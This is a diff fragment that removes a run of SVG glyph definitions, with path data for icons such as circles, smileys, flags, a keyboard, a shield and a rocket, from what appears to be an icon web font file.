-<glyph unicode="&#xf111;" d="M1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf112;" horiz-adv-x="1792" d="M1792 416q0 -166 -127 -451q-3 -7 -10.5 -24t-13.5 -30t-13 -22q-12 -17 -28 -17q-15 0 -23.5 10t-8.5 25q0 9 2.5 26.5t2.5 23.5q5 68 5 123q0 101 -17.5 181t-48.5 138.5t-80 101t-105.5 69.5t-133 42.5t-154 21.5t-175.5 6h-224v-256q0 -26 -19 -45t-45 -19t-45 19 l-512 512q-19 19 -19 45t19 45l512 512q19 19 45 19t45 -19t19 -45v-256h224q713 0 875 -403q53 -134 53 -333z" />
-<glyph unicode="&#xf113;" horiz-adv-x="1664" d="M640 320q0 -40 -12.5 -82t-43 -76t-72.5 -34t-72.5 34t-43 76t-12.5 82t12.5 82t43 76t72.5 34t72.5 -34t43 -76t12.5 -82zM1280 320q0 -40 -12.5 -82t-43 -76t-72.5 -34t-72.5 34t-43 76t-12.5 82t12.5 82t43 76t72.5 34t72.5 -34t43 -76t12.5 -82zM1440 320 q0 120 -69 204t-187 84q-41 0 -195 -21q-71 -11 -157 -11t-157 11q-152 21 -195 21q-118 0 -187 -84t-69 -204q0 -88 32 -153.5t81 -103t122 -60t140 -29.5t149 -7h168q82 0 149 7t140 29.5t122 60t81 103t32 153.5zM1664 496q0 -207 -61 -331q-38 -77 -105.5 -133t-141 -86 t-170 -47.5t-171.5 -22t-167 -4.5q-78 0 -142 3t-147.5 12.5t-152.5 30t-137 51.5t-121 81t-86 115q-62 123 -62 331q0 237 136 396q-27 82 -27 170q0 116 51 218q108 0 190 -39.5t189 -123.5q147 35 309 35q148 0 280 -32q105 82 187 121t189 39q51 -102 51 -218 q0 -87 -27 -168q136 -160 136 -398z" />
-<glyph unicode="&#xf114;" horiz-adv-x="1664" d="M1536 224v704q0 40 -28 68t-68 28h-704q-40 0 -68 28t-28 68v64q0 40 -28 68t-68 28h-320q-40 0 -68 -28t-28 -68v-960q0 -40 28 -68t68 -28h1216q40 0 68 28t28 68zM1664 928v-704q0 -92 -66 -158t-158 -66h-1216q-92 0 -158 66t-66 158v960q0 92 66 158t158 66h320 q92 0 158 -66t66 -158v-32h672q92 0 158 -66t66 -158z" />
-<glyph unicode="&#xf115;" horiz-adv-x="1920" d="M1781 605q0 35 -53 35h-1088q-40 0 -85.5 -21.5t-71.5 -52.5l-294 -363q-18 -24 -18 -40q0 -35 53 -35h1088q40 0 86 22t71 53l294 363q18 22 18 39zM640 768h768v160q0 40 -28 68t-68 28h-576q-40 0 -68 28t-28 68v64q0 40 -28 68t-68 28h-320q-40 0 -68 -28t-28 -68 v-853l256 315q44 53 116 87.5t140 34.5zM1909 605q0 -62 -46 -120l-295 -363q-43 -53 -116 -87.5t-140 -34.5h-1088q-92 0 -158 66t-66 158v960q0 92 66 158t158 66h320q92 0 158 -66t66 -158v-32h544q92 0 158 -66t66 -158v-160h192q54 0 99 -24.5t67 -70.5q15 -32 15 -68z " />
-<glyph unicode="&#xf116;" horiz-adv-x="1792" />
-<glyph unicode="&#xf117;" horiz-adv-x="1792" />
-<glyph unicode="&#xf118;" d="M1134 461q-37 -121 -138 -195t-228 -74t-228 74t-138 195q-8 25 4 48.5t38 31.5q25 8 48.5 -4t31.5 -38q25 -80 92.5 -129.5t151.5 -49.5t151.5 49.5t92.5 129.5q8 26 32 38t49 4t37 -31.5t4 -48.5zM640 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5 t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1152 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1408 640q0 130 -51 248.5t-136.5 204t-204 136.5t-248.5 51t-248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5 t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf119;" d="M1134 307q8 -25 -4 -48.5t-37 -31.5t-49 4t-32 38q-25 80 -92.5 129.5t-151.5 49.5t-151.5 -49.5t-92.5 -129.5q-8 -26 -31.5 -38t-48.5 -4q-26 8 -38 31.5t-4 48.5q37 121 138 195t228 74t228 -74t138 -195zM640 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5 t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1152 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1408 640q0 130 -51 248.5t-136.5 204t-204 136.5t-248.5 51t-248.5 -51t-204 -136.5t-136.5 -204 t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf11a;" d="M1152 448q0 -26 -19 -45t-45 -19h-640q-26 0 -45 19t-19 45t19 45t45 19h640q26 0 45 -19t19 -45zM640 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1152 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5 t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1408 640q0 130 -51 248.5t-136.5 204t-204 136.5t-248.5 51t-248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf11b;" horiz-adv-x="1920" d="M832 448v128q0 14 -9 23t-23 9h-192v192q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-192h-192q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h192v-192q0 -14 9 -23t23 -9h128q14 0 23 9t9 23v192h192q14 0 23 9t9 23zM1408 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5 t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1664 640q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1920 512q0 -212 -150 -362t-362 -150q-192 0 -338 128h-220q-146 -128 -338 -128q-212 0 -362 150 t-150 362t150 362t362 150h896q212 0 362 -150t150 -362z" />
-<glyph unicode="&#xf11c;" horiz-adv-x="1920" d="M384 368v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM512 624v-96q0 -16 -16 -16h-224q-16 0 -16 16v96q0 16 16 16h224q16 0 16 -16zM384 880v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1408 368v-96q0 -16 -16 -16 h-864q-16 0 -16 16v96q0 16 16 16h864q16 0 16 -16zM768 624v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM640 880v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1024 624v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16 h96q16 0 16 -16zM896 880v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1280 624v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1664 368v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1152 880v-96 q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1408 880v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1664 880v-352q0 -16 -16 -16h-224q-16 0 -16 16v96q0 16 16 16h112v240q0 16 16 16h96q16 0 16 -16zM1792 128v896h-1664v-896 h1664zM1920 1024v-896q0 -53 -37.5 -90.5t-90.5 -37.5h-1664q-53 0 -90.5 37.5t-37.5 90.5v896q0 53 37.5 90.5t90.5 37.5h1664q53 0 90.5 -37.5t37.5 -90.5z" />
-<glyph unicode="&#xf11d;" horiz-adv-x="1792" d="M1664 491v616q-169 -91 -306 -91q-82 0 -145 32q-100 49 -184 76.5t-178 27.5q-173 0 -403 -127v-599q245 113 433 113q55 0 103.5 -7.5t98 -26t77 -31t82.5 -39.5l28 -14q44 -22 101 -22q120 0 293 92zM320 1280q0 -35 -17.5 -64t-46.5 -46v-1266q0 -14 -9 -23t-23 -9 h-64q-14 0 -23 9t-9 23v1266q-29 17 -46.5 46t-17.5 64q0 53 37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1792 1216v-763q0 -39 -35 -57q-10 -5 -17 -9q-218 -116 -369 -116q-88 0 -158 35l-28 14q-64 33 -99 48t-91 29t-114 14q-102 0 -235.5 -44t-228.5 -102 q-15 -9 -33 -9q-16 0 -32 8q-32 19 -32 56v742q0 35 31 55q35 21 78.5 42.5t114 52t152.5 49.5t155 19q112 0 209 -31t209 -86q38 -19 89 -19q122 0 310 112q22 12 31 17q31 16 62 -2q31 -20 31 -55z" />
-<glyph unicode="&#xf11e;" horiz-adv-x="1792" d="M832 536v192q-181 -16 -384 -117v-185q205 96 384 110zM832 954v197q-172 -8 -384 -126v-189q215 111 384 118zM1664 491v184q-235 -116 -384 -71v224q-20 6 -39 15q-5 3 -33 17t-34.5 17t-31.5 15t-34.5 15.5t-32.5 13t-36 12.5t-35 8.5t-39.5 7.5t-39.5 4t-44 2 q-23 0 -49 -3v-222h19q102 0 192.5 -29t197.5 -82q19 -9 39 -15v-188q42 -17 91 -17q120 0 293 92zM1664 918v189q-169 -91 -306 -91q-45 0 -78 8v-196q148 -42 384 90zM320 1280q0 -35 -17.5 -64t-46.5 -46v-1266q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v1266 q-29 17 -46.5 46t-17.5 64q0 53 37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1792 1216v-763q0 -39 -35 -57q-10 -5 -17 -9q-218 -116 -369 -116q-88 0 -158 35l-28 14q-64 33 -99 48t-91 29t-114 14q-102 0 -235.5 -44t-228.5 -102q-15 -9 -33 -9q-16 0 -32 8 q-32 19 -32 56v742q0 35 31 55q35 21 78.5 42.5t114 52t152.5 49.5t155 19q112 0 209 -31t209 -86q38 -19 89 -19q122 0 310 112q22 12 31 17q31 16 62 -2q31 -20 31 -55z" />
-<glyph unicode="&#xf120;" horiz-adv-x="1664" d="M585 553l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23t-10 -23zM1664 96v-64q0 -14 -9 -23t-23 -9h-960q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h960q14 0 23 -9 t9 -23z" />
-<glyph unicode="&#xf121;" horiz-adv-x="1920" d="M617 137l-50 -50q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l50 -50q10 -10 10 -23t-10 -23l-393 -393l393 -393q10 -10 10 -23t-10 -23zM1208 1204l-373 -1291q-4 -13 -15.5 -19.5t-23.5 -2.5l-62 17q-13 4 -19.5 15.5t-2.5 24.5 l373 1291q4 13 15.5 19.5t23.5 2.5l62 -17q13 -4 19.5 -15.5t2.5 -24.5zM1865 553l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23t-10 -23z" />
-<glyph unicode="&#xf122;" horiz-adv-x="1792" d="M640 454v-70q0 -42 -39 -59q-13 -5 -25 -5q-27 0 -45 19l-512 512q-19 19 -19 45t19 45l512 512q29 31 70 14q39 -17 39 -59v-69l-397 -398q-19 -19 -19 -45t19 -45zM1792 416q0 -58 -17 -133.5t-38.5 -138t-48 -125t-40.5 -90.5l-20 -40q-8 -17 -28 -17q-6 0 -9 1 q-25 8 -23 34q43 400 -106 565q-64 71 -170.5 110.5t-267.5 52.5v-251q0 -42 -39 -59q-13 -5 -25 -5q-27 0 -45 19l-512 512q-19 19 -19 45t19 45l512 512q29 31 70 14q39 -17 39 -59v-262q411 -28 599 -221q169 -173 169 -509z" />
-<glyph unicode="&#xf123;" horiz-adv-x="1664" d="M1186 579l257 250l-356 52l-66 10l-30 60l-159 322v-963l59 -31l318 -168l-60 355l-12 66zM1638 841l-363 -354l86 -500q5 -33 -6 -51.5t-34 -18.5q-17 0 -40 12l-449 236l-449 -236q-23 -12 -40 -12q-23 0 -34 18.5t-6 51.5l86 500l-364 354q-32 32 -23 59.5t54 34.5 l502 73l225 455q20 41 49 41q28 0 49 -41l225 -455l502 -73q45 -7 54 -34.5t-24 -59.5z" />
-<glyph unicode="&#xf124;" horiz-adv-x="1408" d="M1401 1187l-640 -1280q-17 -35 -57 -35q-5 0 -15 2q-22 5 -35.5 22.5t-13.5 39.5v576h-576q-22 0 -39.5 13.5t-22.5 35.5t4 42t29 30l1280 640q13 7 29 7q27 0 45 -19q15 -14 18.5 -34.5t-6.5 -39.5z" />
-<glyph unicode="&#xf125;" horiz-adv-x="1664" d="M557 256h595v595zM512 301l595 595h-595v-595zM1664 224v-192q0 -14 -9 -23t-23 -9h-224v-224q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v224h-864q-14 0 -23 9t-9 23v864h-224q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h224v224q0 14 9 23t23 9h192q14 0 23 -9t9 -23 v-224h851l246 247q10 9 23 9t23 -9q9 -10 9 -23t-9 -23l-247 -246v-851h224q14 0 23 -9t9 -23z" />
-<glyph unicode="&#xf126;" horiz-adv-x="1024" d="M288 64q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM288 1216q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM928 1088q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM1024 1088q0 -52 -26 -96.5t-70 -69.5 q-2 -287 -226 -414q-68 -38 -203 -81q-128 -40 -169.5 -71t-41.5 -100v-26q44 -25 70 -69.5t26 -96.5q0 -80 -56 -136t-136 -56t-136 56t-56 136q0 52 26 96.5t70 69.5v820q-44 25 -70 69.5t-26 96.5q0 80 56 136t136 56t136 -56t56 -136q0 -52 -26 -96.5t-70 -69.5v-497 q54 26 154 57q55 17 87.5 29.5t70.5 31t59 39.5t40.5 51t28 69.5t8.5 91.5q-44 25 -70 69.5t-26 96.5q0 80 56 136t136 56t136 -56t56 -136z" />
-<glyph unicode="&#xf127;" horiz-adv-x="1664" d="M439 265l-256 -256q-10 -9 -23 -9q-12 0 -23 9q-9 10 -9 23t9 23l256 256q10 9 23 9t23 -9q9 -10 9 -23t-9 -23zM608 224v-320q0 -14 -9 -23t-23 -9t-23 9t-9 23v320q0 14 9 23t23 9t23 -9t9 -23zM384 448q0 -14 -9 -23t-23 -9h-320q-14 0 -23 9t-9 23t9 23t23 9h320 q14 0 23 -9t9 -23zM1648 320q0 -120 -85 -203l-147 -146q-83 -83 -203 -83q-121 0 -204 85l-334 335q-21 21 -42 56l239 18l273 -274q27 -27 68 -27.5t68 26.5l147 146q28 28 28 67q0 40 -28 68l-274 275l18 239q35 -21 56 -42l336 -336q84 -86 84 -204zM1031 1044l-239 -18 l-273 274q-28 28 -68 28q-39 0 -68 -27l-147 -146q-28 -28 -28 -67q0 -40 28 -68l274 -274l-18 -240q-35 21 -56 42l-336 336q-84 86 -84 204q0 120 85 203l147 146q83 83 203 83q121 0 204 -85l334 -335q21 -21 42 -56zM1664 960q0 -14 -9 -23t-23 -9h-320q-14 0 -23 9 t-9 23t9 23t23 9h320q14 0 23 -9t9 -23zM1120 1504v-320q0 -14 -9 -23t-23 -9t-23 9t-9 23v320q0 14 9 23t23 9t23 -9t9 -23zM1527 1353l-256 -256q-11 -9 -23 -9t-23 9q-9 10 -9 23t9 23l256 256q10 9 23 9t23 -9q9 -10 9 -23t-9 -23z" />
-<glyph unicode="&#xf128;" horiz-adv-x="1024" d="M704 280v-240q0 -16 -12 -28t-28 -12h-240q-16 0 -28 12t-12 28v240q0 16 12 28t28 12h240q16 0 28 -12t12 -28zM1020 880q0 -54 -15.5 -101t-35 -76.5t-55 -59.5t-57.5 -43.5t-61 -35.5q-41 -23 -68.5 -65t-27.5 -67q0 -17 -12 -32.5t-28 -15.5h-240q-15 0 -25.5 18.5 t-10.5 37.5v45q0 83 65 156.5t143 108.5q59 27 84 56t25 76q0 42 -46.5 74t-107.5 32q-65 0 -108 -29q-35 -25 -107 -115q-13 -16 -31 -16q-12 0 -25 8l-164 125q-13 10 -15.5 25t5.5 28q160 266 464 266q80 0 161 -31t146 -83t106 -127.5t41 -158.5z" />
-<glyph unicode="&#xf129;" horiz-adv-x="640" d="M640 192v-128q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h64v384h-64q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h384q26 0 45 -19t19 -45v-576h64q26 0 45 -19t19 -45zM512 1344v-192q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v192 q0 26 19 45t45 19h256q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf12a;" horiz-adv-x="640" d="M512 288v-224q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v224q0 26 19 45t45 19h256q26 0 45 -19t19 -45zM542 1344l-28 -768q-1 -26 -20.5 -45t-45.5 -19h-256q-26 0 -45.5 19t-20.5 45l-28 768q-1 26 17.5 45t44.5 19h320q26 0 44.5 -19t17.5 -45z" />
-<glyph unicode="&#xf12b;" d="M897 167v-167h-248l-159 252l-24 42q-8 9 -11 21h-3l-9 -21q-10 -20 -25 -44l-155 -250h-258v167h128l197 291l-185 272h-137v168h276l139 -228q2 -4 23 -42q8 -9 11 -21h3q3 9 11 21l25 42l140 228h257v-168h-125l-184 -267l204 -296h109zM1534 846v-206h-514l-3 27 q-4 28 -4 46q0 64 26 117t65 86.5t84 65t84 54.5t65 54t26 64q0 38 -29.5 62.5t-70.5 24.5q-51 0 -97 -39q-14 -11 -36 -38l-105 92q26 37 63 66q83 65 188 65q110 0 178 -59.5t68 -158.5q0 -56 -24.5 -103t-62 -76.5t-81.5 -58.5t-82 -50.5t-65.5 -51.5t-30.5 -63h232v80 h126z" />
-<glyph unicode="&#xf12c;" d="M897 167v-167h-248l-159 252l-24 42q-8 9 -11 21h-3l-9 -21q-10 -20 -25 -44l-155 -250h-258v167h128l197 291l-185 272h-137v168h276l139 -228q2 -4 23 -42q8 -9 11 -21h3q3 9 11 21l25 42l140 228h257v-168h-125l-184 -267l204 -296h109zM1536 -50v-206h-514l-4 27 q-3 45 -3 46q0 64 26 117t65 86.5t84 65t84 54.5t65 54t26 64q0 38 -29.5 62.5t-70.5 24.5q-51 0 -97 -39q-14 -11 -36 -38l-105 92q26 37 63 66q80 65 188 65q110 0 178 -59.5t68 -158.5q0 -66 -34.5 -118.5t-84 -86t-99.5 -62.5t-87 -63t-41 -73h232v80h126z" />
-<glyph unicode="&#xf12d;" horiz-adv-x="1920" d="M896 128l336 384h-768l-336 -384h768zM1909 1205q15 -34 9.5 -71.5t-30.5 -65.5l-896 -1024q-38 -44 -96 -44h-768q-38 0 -69.5 20.5t-47.5 54.5q-15 34 -9.5 71.5t30.5 65.5l896 1024q38 44 96 44h768q38 0 69.5 -20.5t47.5 -54.5z" />
-<glyph unicode="&#xf12e;" horiz-adv-x="1664" d="M1664 438q0 -81 -44.5 -135t-123.5 -54q-41 0 -77.5 17.5t-59 38t-56.5 38t-71 17.5q-110 0 -110 -124q0 -39 16 -115t15 -115v-5q-22 0 -33 -1q-34 -3 -97.5 -11.5t-115.5 -13.5t-98 -5q-61 0 -103 26.5t-42 83.5q0 37 17.5 71t38 56.5t38 59t17.5 77.5q0 79 -54 123.5 t-135 44.5q-84 0 -143 -45.5t-59 -127.5q0 -43 15 -83t33.5 -64.5t33.5 -53t15 -50.5q0 -45 -46 -89q-37 -35 -117 -35q-95 0 -245 24q-9 2 -27.5 4t-27.5 4l-13 2q-1 0 -3 1q-2 0 -2 1v1024q2 -1 17.5 -3.5t34 -5t21.5 -3.5q150 -24 245 -24q80 0 117 35q46 44 46 89 q0 22 -15 50.5t-33.5 53t-33.5 64.5t-15 83q0 82 59 127.5t144 45.5q80 0 134 -44.5t54 -123.5q0 -41 -17.5 -77.5t-38 -59t-38 -56.5t-17.5 -71q0 -57 42 -83.5t103 -26.5q64 0 180 15t163 17v-2q-1 -2 -3.5 -17.5t-5 -34t-3.5 -21.5q-24 -150 -24 -245q0 -80 35 -117 q44 -46 89 -46q22 0 50.5 15t53 33.5t64.5 33.5t83 15q82 0 127.5 -59t45.5 -143z" />
-<glyph unicode="&#xf130;" horiz-adv-x="1152" d="M1152 832v-128q0 -221 -147.5 -384.5t-364.5 -187.5v-132h256q26 0 45 -19t19 -45t-19 -45t-45 -19h-640q-26 0 -45 19t-19 45t19 45t45 19h256v132q-217 24 -364.5 187.5t-147.5 384.5v128q0 26 19 45t45 19t45 -19t19 -45v-128q0 -185 131.5 -316.5t316.5 -131.5 t316.5 131.5t131.5 316.5v128q0 26 19 45t45 19t45 -19t19 -45zM896 1216v-512q0 -132 -94 -226t-226 -94t-226 94t-94 226v512q0 132 94 226t226 94t226 -94t94 -226z" />
-<glyph unicode="&#xf131;" horiz-adv-x="1408" d="M271 591l-101 -101q-42 103 -42 214v128q0 26 19 45t45 19t45 -19t19 -45v-128q0 -53 15 -113zM1385 1193l-361 -361v-128q0 -132 -94 -226t-226 -94q-55 0 -109 19l-96 -96q97 -51 205 -51q185 0 316.5 131.5t131.5 316.5v128q0 26 19 45t45 19t45 -19t19 -45v-128 q0 -221 -147.5 -384.5t-364.5 -187.5v-132h256q26 0 45 -19t19 -45t-19 -45t-45 -19h-640q-26 0 -45 19t-19 45t19 45t45 19h256v132q-125 13 -235 81l-254 -254q-10 -10 -23 -10t-23 10l-82 82q-10 10 -10 23t10 23l1234 1234q10 10 23 10t23 -10l82 -82q10 -10 10 -23 t-10 -23zM1005 1325l-621 -621v512q0 132 94 226t226 94q102 0 184.5 -59t116.5 -152z" />
-<glyph unicode="&#xf132;" horiz-adv-x="1280" d="M1088 576v640h-448v-1137q119 63 213 137q235 184 235 360zM1280 1344v-768q0 -86 -33.5 -170.5t-83 -150t-118 -127.5t-126.5 -103t-121 -77.5t-89.5 -49.5t-42.5 -20q-12 -6 -26 -6t-26 6q-16 7 -42.5 20t-89.5 49.5t-121 77.5t-126.5 103t-118 127.5t-83 150 t-33.5 170.5v768q0 26 19 45t45 19h1152q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf133;" horiz-adv-x="1664" d="M128 -128h1408v1024h-1408v-1024zM512 1088v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-288q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1280 1088v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-288q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1664 1152v-1280 q0 -52 -38 -90t-90 -38h-1408q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h128v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h384v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h128q52 0 90 -38t38 -90z" />
-<glyph unicode="&#xf134;" horiz-adv-x="1408" d="M512 1344q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 1376v-320q0 -16 -12 -25q-8 -7 -20 -7q-4 0 -7 1l-448 96q-11 2 -18 11t-7 20h-256v-102q111 -23 183.5 -111t72.5 -203v-800q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v800 q0 106 62.5 190.5t161.5 114.5v111h-32q-59 0 -115 -23.5t-91.5 -53t-66 -66.5t-40.5 -53.5t-14 -24.5q-17 -35 -57 -35q-16 0 -29 7q-23 12 -31.5 37t3.5 49q5 10 14.5 26t37.5 53.5t60.5 70t85 67t108.5 52.5q-25 42 -25 86q0 66 47 113t113 47t113 -47t47 -113 q0 -33 -14 -64h302q0 11 7 20t18 11l448 96q3 1 7 1q12 0 20 -7q12 -9 12 -25z" />
-<glyph unicode="&#xf135;" horiz-adv-x="1664" d="M1440 1088q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM1664 1376q0 -249 -75.5 -430.5t-253.5 -360.5q-81 -80 -195 -176l-20 -379q-2 -16 -16 -26l-384 -224q-7 -4 -16 -4q-12 0 -23 9l-64 64q-13 14 -8 32l85 276l-281 281l-276 -85q-3 -1 -9 -1 q-14 0 -23 9l-64 64q-17 19 -5 39l224 384q10 14 26 16l379 20q96 114 176 195q188 187 358 258t431 71q14 0 24 -9.5t10 -22.5z" />
-<glyph unicode="&#xf136;" horiz-adv-x="1792" d="M1745 763l-164 -763h-334l178 832q13 56 -15 88q-27 33 -83 33h-169l-204 -953h-334l204 953h-286l-204 -953h-334l204 953l-153 327h1276q101 0 189.5 -40.5t147.5 -113.5q60 -73 81 -168.5t0 -194.5z" />
-<glyph unicode="&#xf137;" d="M909 141l102 102q19 19 19 45t-19 45l-307 307l307 307q19 19 19 45t-19 45l-102 102q-19 19 -45 19t-45 -19l-454 -454q-19 -19 -19 -45t19 -45l454 -454q19 -19 45 -19t45 19zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5 t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf138;" d="M717 141l454 454q19 19 19 45t-19 45l-454 454q-19 19 -45 19t-45 -19l-102 -102q-19 -19 -19 -45t19 -45l307 -307l-307 -307q-19 -19 -19 -45t19 -45l102 -102q19 -19 45 -19t45 19zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5 t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf139;" d="M1165 397l102 102q19 19 19 45t-19 45l-454 454q-19 19 -45 19t-45 -19l-454 -454q-19 -19 -19 -45t19 -45l102 -102q19 -19 45 -19t45 19l307 307l307 -307q19 -19 45 -19t45 19zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5 t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf13a;" d="M813 237l454 454q19 19 19 45t-19 45l-102 102q-19 19 -45 19t-45 -19l-307 -307l-307 307q-19 19 -45 19t-45 -19l-102 -102q-19 -19 -19 -45t19 -45l454 -454q19 -19 45 -19t45 19zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5 t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf13b;" horiz-adv-x="1408" d="M1130 939l16 175h-884l47 -534h612l-22 -228l-197 -53l-196 53l-13 140h-175l22 -278l362 -100h4v1l359 99l50 544h-644l-15 181h674zM0 1408h1408l-128 -1438l-578 -162l-574 162z" />
-<glyph unicode="&#xf13c;" horiz-adv-x="1792" d="M275 1408h1505l-266 -1333l-804 -267l-698 267l71 356h297l-29 -147l422 -161l486 161l68 339h-1208l58 297h1209l38 191h-1208z" />
-<glyph unicode="&#xf13d;" horiz-adv-x="1792" d="M960 1280q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1792 352v-352q0 -22 -20 -30q-8 -2 -12 -2q-13 0 -23 9l-93 93q-119 -143 -318.5 -226.5t-429.5 -83.5t-429.5 83.5t-318.5 226.5l-93 -93q-9 -9 -23 -9q-4 0 -12 2q-20 8 -20 30v352 q0 14 9 23t23 9h352q22 0 30 -20q8 -19 -7 -35l-100 -100q67 -91 189.5 -153.5t271.5 -82.5v647h-192q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h192v163q-58 34 -93 92.5t-35 128.5q0 106 75 181t181 75t181 -75t75 -181q0 -70 -35 -128.5t-93 -92.5v-163h192q26 0 45 -19 t19 -45v-128q0 -26 -19 -45t-45 -19h-192v-647q149 20 271.5 82.5t189.5 153.5l-100 100q-15 16 -7 35q8 20 30 20h352q14 0 23 -9t9 -23z" />
